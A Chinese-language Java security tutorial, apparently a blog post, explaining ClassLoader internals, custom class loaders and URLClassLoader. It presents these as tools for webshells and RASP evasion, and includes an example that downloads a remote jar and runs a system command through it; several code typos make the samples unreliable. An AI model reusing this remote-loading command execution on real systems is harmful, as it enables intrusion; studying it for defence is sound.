ClassLoader类有如下核心方法
loadClass(加载指定的Java类)findClass(查找指定的Java类)findLoadedClass(查找JVM已经加载过的类)defineClass(定义一个Java类)resolveClass(链接指定的Java类)
Java类加载方式分为显式和隐式:
显式为使用Java反射或者ClassLoader来动态加载一个类对象。即类动态加载,自定义类加载器去加载任意类隐式为类名.方法名()或new类实例
常用的类动态加载方式:
// 反射加载TestHelloWorld示例Class.forName("com.anbai.sec.classloader.TesthellowWorld")// ClassLoader加载TestHelloWorld示例this.getClass().getClassLoader().loadClass("com.anbai.sec.classloader.TestHelloWorld");
Class.forName("类名")默认初始化被加载类的静态属性和方法,Class.forName("类名",是否初始化类,类加载),可以不初始化类ClassLoader.loadClass默认不会初始化类方法
ClassLoader类加载流程
ClassLoader加载com.anbai.sec.classloader.TestHelloWorld类重要加载流程
ClassLoader会调用public Class<?> loadClass(String name)方法加载com.anbai.sec.classloader.TestHelloWorld类。- 调用
findLoadedClass方法检查TestHelloWorld类是否已经被初始化,如果JVM已经初始化过该类则直接返回类对象。 - 如果创建当前
ClassLoader时传入了父类加载器(newClassLoader(父类加载器))就使用父类加载器TestHelloWorld类,否则使用JVM的Bootstrap ClassLoader加载。 - 假如上一步无法完成加载
TestHelloWorld类,将调用自身的findClass方法加载TestHelloWorld类。 - 如果当前
ClassLoader没用重写findClass方法,那么直接返回类加载失败异常。如果当前类重写了findClass方法并通过传入的com.anbai.sec.classloader.TestHelloWorld类名遭到对应的字节码,那么将调用defineClass方法去JVM中注册该类。 - 如果调用
loadClass的时候传入的resolve参数为true,还需调用resolveClass方法链接类,默认为false。 - 最后返回一个被JVM加载后的
java.lan.Class类对象。自定义ClassLoader
java.lan.ClassLoader是所有类加载器的父类,java.lang.ClassLoader有非常多的子类加载器,如用于加载jar包的java.net.URLClassLoader其本身通过继承java.lang.ClassLoader类,重写了findClass方法从而实现了加载目录class文件甚至远程资源文件。
使用类加载器来实现加载自定义的字节码(以加载TestHelloWorld类为例)并调用hello方法。
如果
com.anbai.sec.classloader.TestHelloWorld类存在的情况下,我们可以使用如下代码即可实现调用hello方法并输出:TestHelloWorld t = new TestHelloWorld;String str = t.hello();System.out.println(str);
如果
com.anbai.sec.classloader.TestHelloWorld根本就不存在于我们的classpath,那么我们可以使用自定义类加载器重写findClass方法,然后在调用defineClass方法的时候传入TestHelloWorld类的字节码的方式来向JVM中定义一个TestHelloWorld类,最后通过反射机制就可以调用TestHelloWorld类的hello方法了。
TestClassLoader示例代码:
package com.anbai.sec.classloader;import java.lang.reflect.method;public class TestClassloader extends ClassLoader {// TestHelloWorld类名private static String testClassName = "com.anbai.sec.classLoader.TestHelloWorld";// TestHelloWorld类字节码private static byte[] testclassBytes = new byte[]{-54, -2, -70, -66, 0, 0, 0, 51, 0, 17, 10, 0, 4, 0, 13, 8, 0, 14, 7, 0, 15, 7, 0,16, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100,101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101,1, 0, 5, 104, 101, 108, 108, 111, 1, 0, 20, 40, 41, 76, 106, 97, 118, 97, 47, 108,97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 10, 83, 111, 117, 114, 99,101, 70, 105, 108, 101, 1, 0, 19, 84, 101, 115, 116, 72, 101, 108, 108, 111, 87, 111,114, 108, 100, 46, 106, 97, 118, 97, 12, 0, 5, 0, 6, 1, 0, 12, 72, 101, 108, 108, 111,32, 87, 111, 114, 108, 100, 126, 1, 0, 40, 99, 111, 109, 47, 97, 110, 98, 97, 105, 47,115, 101, 99, 47, 99, 108, 97, 115, 115, 108, 111, 97, 100, 101, 114, 47, 84, 101, 115,116, 72, 101, 108, 108, 111, 87, 111, 114, 108, 100, 1, 0, 16, 106, 97, 118, 97, 47, 108,97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 0, 33, 0, 3, 0, 4, 0, 0, 0, 0, 0, 2, 0, 1,0, 5, 0, 6, 0, 1, 0, 7, 0, 0, 0, 29, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0,1, 0, 8, 0, 0, 0, 6, 0, 1, 0, 0, 0, 7, 0, 1, 0, 9, 0, 10, 0, 1, 0, 7, 0, 0, 0, 27, 0, 1,0, 1, 0, 0, 0, 3, 18, 2, -80, 0, 0, 0, 1, 0, 8, 0, 0, 0, 6, 0, 1, 0, 0, 0, 10, 0, 1, 0, 11,0, 0, 0, 2, 0, 12};public Class<?> findClass(string name) throws ClassNotFoundException {// 只处理TestHellWorld类if (name.equals(testClassName)) {// 调用JVM的native方法定义TestHelloWorld类return defineClass(testClassName, testClassBytes, 0, testClassBytes.length);}return super.findClass(name);}public static void main(String[] arge) {// 创建自定义的类加载器TestClassLoader loader = new TestClassLoader();try {// 使用自定义的类加载器加载TestHelloWorld类Class testClass = loader.loadClass(testClassName);// 反射创建TestHelloWorld类,等价与TestHelloWorld t = new TestHelloWorld();Object testInstance = testClass.newInstance();// 反射获取hello方法Method method = testInstance.getClass().getMethod("hello");// 反射调用hell方法,等价与 String str = t.hello();String str = (String) method.invoke(testINstance);System.out.println(str);} catch (Exception e) {e.printStackTrace();}}}
利用自定义类加载器可以在webshell中实现加载并调用自己编译的类对象。
如:本地命令执行漏洞调用自定义类字节码的native方法绕过RASP检测,也可以用于加密重要的Java类字节码(弱加密)。
URLClassLoader
URLClassLoader继承了ClassLoader,URLClassLoader提供了加载远程资源的能力, 写漏洞利用的Payload或者webshell的时候使用这个特征来加载远程的jar来实现远程的类方法调用。
import java.io.ByteArrayOutputStream;import java.io.InputStream;import java.net.URL;import java.net.URLClassLoader;public class TestURLClassLoader {public static void main (String[] args) {try {// 定义远程加载的jar路径URL url = new URL("https://javaweb.org/tools/cmd.jar");// 创建URLClassLoader对象,并远程加载jar包URLCLassLoader ucl = new URLClassLoader(new URL[]{url});// 定义需要执行的系统命令String cmd = "ls";// 通过URLClassLoader加载远程jar包中的CMD类Class cmdClass = ucl.loadClass("CMD");// 调用CMD类中的exec方法。等价于:Process process = CMD.exec("whoami");Process processs = (Process) cmdClass.getMethod("exec", String.class).invoke(null.cmd);// 获取命令执行结果的输入流InputStream in = process.getInputStream();ByteArrayOutputStream baos = new ByteArrayOutputStream();byte[] b = new byte[1024];int a = -1;// 读取命令执行结果while ((a = in.read(b)) != -1) {baos.write(b, 0, a);}// 输出命令执行结果System.out.println(baos.toString());} catch (Exception e) {e.printStackTrace();}}}
总结:
ClassLoader是JVM中一个非常重要的组成部分ClassLoader可以加载任意的java类- 通过自定义
ClassLoader更能够实现自定义类加载行为
若有收获,就点个赞吧
0 人点赞
